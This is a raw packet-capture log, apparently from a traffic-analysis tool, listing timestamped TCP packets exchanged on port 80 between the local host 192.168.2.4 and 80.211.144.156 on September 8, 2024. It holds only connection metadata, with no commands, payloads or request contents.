                                                          Sep 8, 2024 11:54:41.853282928 CEST6488380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:41.925760984 CEST6488080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:41.929398060 CEST6488380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:41.929399967 CEST6488480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:41.934338093 CEST806488480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:41.934537888 CEST6488480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:41.934592962 CEST806488380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:41.934617043 CEST6488480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:41.934683084 CEST6488380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:41.939371109 CEST806488480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:42.290895939 CEST6488480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:42.296987057 CEST806488480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:42.296997070 CEST806488480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:42.297008038 CEST806488480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:42.609850883 CEST806488480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:42.718698025 CEST6488480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:42.815144062 CEST806488480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:42.854625940 CEST6488480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:42.855593920 CEST6488580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:42.859980106 CEST806488480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:42.860025883 CEST6488480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:42.860419035 CEST806488580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:42.860469103 CEST6488580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:42.860663891 CEST6488580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:42.865397930 CEST806488580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:42.934381008 CEST6488580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:42.935439110 CEST6488680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:42.940306902 CEST806488680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:58.681440115 CEST6490480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:58.762391090 CEST6490480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:58.763346910 CEST6490580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:58.767909050 CEST806490480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:58.767957926 CEST6490480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:58.768742085 CEST806490580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:58.768800020 CEST6490580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:58.768934011 CEST6490580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:58.773797989 CEST806490580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:59.119034052 CEST6490580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:59.124346018 CEST806490580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:59.124360085 CEST806490580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:59.124372005 CEST806490580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:59.468667984 CEST806490580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:59.514240980 CEST6490580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:59.604737043 CEST6490680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:59.605127096 CEST6490580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:59.609625101 CEST806490680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:59.609832048 CEST6490680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:59.609960079 CEST6490680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:59.610119104 CEST806490580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:59.612709045 CEST6490580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:59.614716053 CEST806490680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:59.726739883 CEST6490780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:59.732597113 CEST806490780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:59.732775927 CEST6490780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:59.732872963 CEST6490780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:59.738538980 CEST806490780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:59.962795973 CEST6490680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:59.968219995 CEST806490680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:59.968229055 CEST806490680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:00.087774038 CEST6490780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:00.092978954 CEST806490780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:00.093075991 CEST806490780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:00.093101025 CEST806490780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:00.275506020 CEST806490680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:00.322108984 CEST6490680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:00.429953098 CEST806490780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:00.474217892 CEST806490680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:00.478379965 CEST6490780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:00.525202990 CEST6490680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:00.562385082 CEST806490780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:00.603302002 CEST6490780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:00.679697037 CEST6485280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:00.684048891 CEST6490680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:00.684170008 CEST6490780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:00.684938908 CEST6490880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:00.689095974 CEST806490680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:00.689141035 CEST6490680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:00.689368963 CEST806490780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:00.689404011 CEST6490780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:00.689774036 CEST806490880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:00.689837933 CEST6490880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:00.689992905 CEST6490880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:00.694725990 CEST806490880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:01.040925980 CEST6490880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:01.046156883 CEST806490880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:01.046170950 CEST806490880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:01.046185017 CEST806490880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:01.370248079 CEST806490880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:01.415813923 CEST6490880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:01.577001095 CEST806490880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:01.622419119 CEST6490880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:01.694880009 CEST6490980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:01.699774027 CEST806490980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:01.699860096 CEST6490980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:01.700083971 CEST6490980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:01.704842091 CEST806490980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:02.056648970 CEST6490980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:02.062783003 CEST806490980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:02.062792063 CEST806490980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:02.062802076 CEST806490980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:02.368545055 CEST806490980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:02.415812016 CEST6490980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:02.575196028 CEST806490980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:02.619218111 CEST6490980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:02.697761059 CEST6490980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:02.698609114 CEST6491080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:02.702908039 CEST806490980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:02.702948093 CEST6490980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:02.703398943 CEST806491080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:02.703444958 CEST6491080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:02.703571081 CEST6491080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:02.708327055 CEST806491080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:03.056534052 CEST6491080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:03.061515093 CEST806491080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:03.061544895 CEST806491080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:03.061554909 CEST806491080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:03.375824928 CEST806491080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:03.434439898 CEST6491080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:03.505332947 CEST806491080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:03.558409929 CEST6491080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:03.636523962 CEST6491080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:03.638412952 CEST6491180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:03.642577887 CEST806491080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:03.643588066 CEST806491180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:03.646579027 CEST6491080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:03.646579981 CEST6491180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:03.646579981 CEST6491180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:03.651904106 CEST806491180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:03.994426012 CEST6491180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:03.999486923 CEST806491180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:03.999490976 CEST806491180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:03.999516010 CEST806491180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:04.311695099 CEST806491180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:04.370419025 CEST6491180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:04.440790892 CEST806491180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:04.493954897 CEST6491180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:04.569250107 CEST6490880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:04.574712038 CEST6491180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:04.575607061 CEST6491280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:04.579982996 CEST806491180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:04.580028057 CEST6491180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:04.580403090 CEST806491280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:04.580465078 CEST6491280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:04.580560923 CEST6491280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:04.585448980 CEST806491280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:04.931965113 CEST6491280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:04.936944962 CEST806491280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:04.936958075 CEST806491280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:04.936968088 CEST806491280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:05.247863054 CEST806491280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:05.290843010 CEST6491280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:05.377271891 CEST806491280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:05.434423923 CEST6491280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:05.479728937 CEST6491380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:05.479729891 CEST6491280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:05.484972954 CEST806491380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:05.485181093 CEST6491380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:05.485236883 CEST6491380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:05.485364914 CEST806491280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:05.485486984 CEST6491280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:05.490170956 CEST806491380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:05.491274118 CEST6491380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:05.494410038 CEST6491480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:05.499716043 CEST806491480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:05.502553940 CEST6491480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:05.506413937 CEST6491480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:05.512257099 CEST806491480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:05.537761927 CEST806491380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:05.853468895 CEST6491480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:05.868772030 CEST806491480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:05.868819952 CEST806491480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:05.868824959 CEST806491480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:05.975574017 CEST806491380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:05.975771904 CEST6491380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:06.168473005 CEST806491480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:06.212807894 CEST6491480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:06.296525955 CEST806491480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:06.357124090 CEST6491480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:06.429109097 CEST6491480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:06.429966927 CEST6491580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:06.434393883 CEST806491480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:06.434474945 CEST6491480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:06.434771061 CEST806491580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:06.434906960 CEST6491580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:06.435009956 CEST6491580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:06.439775944 CEST806491580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:06.791094065 CEST6491580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:06.797097921 CEST806491580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:06.797116041 CEST806491580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:06.797127962 CEST806491580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:07.102499962 CEST806491580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:07.150181055 CEST6491580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:07.236706018 CEST806491580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:07.236891985 CEST6491580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:07.242084980 CEST806491580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:07.242129087 CEST6491580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:07.349442005 CEST6491680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:07.354931116 CEST806491680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:07.355026007 CEST6491680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:07.355139017 CEST6491680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:07.360640049 CEST806491680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:07.714415073 CEST6491680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:07.719429016 CEST806491680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:07.719436884 CEST806491680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:07.719505072 CEST806491680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:08.282715082 CEST806491680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:08.282731056 CEST806491680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:08.282743931 CEST806491680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:08.282860041 CEST6491680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:08.397412062 CEST6491680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:08.397866011 CEST6491780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:08.402694941 CEST806491680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:08.402704954 CEST806491780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:08.406595945 CEST6491780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:08.406613111 CEST6491680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:08.406723022 CEST6491780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:08.411561012 CEST806491780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:08.759759903 CEST6491780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:08.764885902 CEST806491780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:08.764899969 CEST806491780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:08.764909029 CEST806491780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:09.073185921 CEST806491780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:09.118946075 CEST6491780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:09.207037926 CEST806491780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:09.259573936 CEST6491780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:09.339657068 CEST6491780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:09.340534925 CEST6491880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:09.344835043 CEST806491780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:09.344878912 CEST6491780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:09.345318079 CEST806491880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:09.345372915 CEST6491880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:09.345478058 CEST6491880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:09.350178003 CEST806491880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:09.697329998 CEST6491880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:09.702460051 CEST806491880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:09.702469110 CEST806491880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:09.702477932 CEST806491880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:10.013786077 CEST806491880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:10.058427095 CEST6491880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:10.145342112 CEST806491880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:10.198436975 CEST6491880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:10.275254011 CEST6491880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:10.275284052 CEST6491980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:10.280865908 CEST806491980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:10.281088114 CEST806491880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:10.281142950 CEST6491980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:10.281451941 CEST6491980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:10.281827927 CEST6491880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:10.286518097 CEST806491980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:10.495939970 CEST6492080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:24.993937969 CEST6493880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:25.155913115 CEST806493880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:25.197087049 CEST6493880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:25.287951946 CEST6493880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:25.288471937 CEST6493980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:25.294064045 CEST806493980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:25.294084072 CEST806493880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:25.294162035 CEST6493880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:25.294173002 CEST6493980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:25.294327021 CEST6493980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:25.300201893 CEST806493980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:25.650296926 CEST6493980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:25.655397892 CEST806493980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:25.655406952 CEST806493980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:25.656516075 CEST806493980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:25.964776039 CEST806493980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:26.013605118 CEST6493980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:26.094711065 CEST806493980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:26.150432110 CEST6493980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:26.209038019 CEST6493980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:26.210009098 CEST6494080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:26.214663029 CEST806493980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:26.214792013 CEST6493980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:26.215037107 CEST806494080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:26.215179920 CEST6494080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:26.215382099 CEST6494080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:26.220127106 CEST806494080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:26.572230101 CEST6494080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:26.577294111 CEST806494080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:26.577301979 CEST806494080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:26.577312946 CEST806494080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:26.902813911 CEST806494080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:26.947093010 CEST6494080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:27.034904003 CEST806494080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:27.087713003 CEST6494080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:27.168519020 CEST6494080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:27.169406891 CEST6494180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:27.174746990 CEST806494080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:27.174797058 CEST6494080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:27.174972057 CEST806494180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:27.175052881 CEST6494180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:27.175180912 CEST6494180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:27.180218935 CEST806494180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:27.526520014 CEST6494180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:27.531649113 CEST806494180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:27.531663895 CEST806494180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:27.531673908 CEST806494180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:27.849035978 CEST806494180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:27.902441025 CEST6494180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:27.964030027 CEST6494180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:27.964030027 CEST6494280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:27.970392942 CEST806494280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:27.970551014 CEST806494180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:27.970659971 CEST6494180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:27.970659971 CEST6494280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:27.970838070 CEST6494280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:27.976084948 CEST806494280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:28.084836006 CEST6494380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:28.089762926 CEST806494380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:28.092694044 CEST6494380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:28.092694044 CEST6494380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:28.097760916 CEST806494380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:28.324522018 CEST6494280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:28.329446077 CEST806494280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:28.329503059 CEST806494280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:28.448515892 CEST6494380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:28.454612970 CEST806494380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:28.454622030 CEST806494380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:28.454627991 CEST806494380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:28.640860081 CEST806494280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:28.681478977 CEST6494280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:28.755424976 CEST806494380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:28.769165039 CEST806494280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:28.803440094 CEST6494380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:28.822077990 CEST6494280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:28.955667973 CEST806494380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:29.009609938 CEST6494380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:29.081599951 CEST6494280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:29.081722975 CEST6494380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:29.082400084 CEST6494480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:29.089618921 CEST806494480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:29.089684963 CEST6494480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:29.089736938 CEST806494280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:29.089778900 CEST6494280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:29.089884996 CEST6494480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:29.090099096 CEST806494380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:29.090148926 CEST6494380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:29.095283985 CEST806494480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:29.447614908 CEST6494480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:29.452640057 CEST806494480.211.144.156192.168.2.4
